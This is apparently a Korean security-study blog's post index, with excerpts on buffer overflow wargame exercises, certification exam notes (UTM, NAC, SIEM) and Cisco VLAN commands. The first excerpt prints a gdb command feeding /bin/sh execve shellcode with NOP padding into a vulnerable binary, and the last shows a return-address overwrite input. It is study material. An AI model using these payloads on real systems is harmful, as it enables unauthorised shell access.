본문 바로가기

전체 글231

정보보안3 6차시 쉘코드 모음 : https://pwnable-study.tistory.com/44 첫 번째 문제인 gremlin256바이트 배열 변수 사용본래 gremlin 파일은 권한때문에 gdb로 실행불가이 때 cp로 파일을 복사하여 복사한 파일로 gdb를 실행함 (gdb) r $(python -c 'print "\x41"*210 + "\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x99\xb0\x0b\xcd\x80" + "\x90"*26 + "AAAA"') => gdb를 실행할 때 python으로 문자열을 반복하여 넣는다 \x41은 A\x90은 NOP 코드를 의미한다 변수 크기가 256바이트이므로A 210개, 쉘코드 24바이.. 2024. 6. 16.
필수기출1200 ~ 506 444.UTM (Unified Threat Management)- 다양한 보안 솔루션을 하나의 장비에 탑재하여 운영하는 all in one 통합보안솔루션- 보안 정책, 필터링 시그니처를 통합 관리. 445.NAC 주요기능- 접근제어 및 인증- PC 및 네트워크 장치 통제- 해킹, 웜, 유해 트래픽 차단- 백신, 패치, 자산 관리- 내부 직원 역할 기반의 접근제어 446.SIEM 프로그램- Splunk, QRadar, Arcsight, HPE ArcSight, LogRhythm + Encase : 포렌식 조사 및 분석 소프트웨어 447.SOA, SIRP, TIP를 폭넓게 포함하는 개념유입되는 위험에 대해 대응레벨을 자동으로 분류표준화된 업무 프로세스에 따라 사람과 기계가 유기적으로 협력할수있도록 지원하는 .. 2024. 6. 16.
네트워크1 6차시 ◈ vlan 설정 파일 vlan.dat 과 삭제하는 방법스위치를 UI상에서 삭제해도 파일은 별개임Sw1#dirDirectory of flash:/1 -rw- 3058048 c2950-i6q4l2-mz.121-22.EA4.bin4 -rw- 676 vlan.dat64016384 bytes total (60957660 bytes free) Sw1#delete flash:vlan.datDelete filename [vlan.dat]?Delete flash:/vlan.dat? [confirm] ◈ vlan 이름 지정Sw1(config)#vlan 20Sw1(config-vlan)#name v20Sw1(config-vlan)#vlan 30Sw1(config-vlan)#name v30 ◈ 각 포트를 vlan에 소속.. 2024. 6. 16.
정보보안3 5차시 파이썬 (인터렉티브 쉘 = 대화형 쉘 = 명령어를 입력하면 시스템이 그 결과를 즉시 반환하는 환경)(python -c 'print("A"*16 + "\xf0\x84\x04\x08")'; cat) | ./bof1 print("A"*16 + "\xf0\x84\x04\x08")=> A를 16개 출력하고, 목표 주소를 출력 (주소는 리틀엔디안 방식 때문에 거꾸로 뒤집어서 배열) # python3 --help usage: python3 [option] ... [-c cmd | -m mod | file | -] [arg] ... Options (and corresponding environment variables): ...-c cmd : program passed in as string (terminates op.. 2024. 6. 15.

티스토리툴바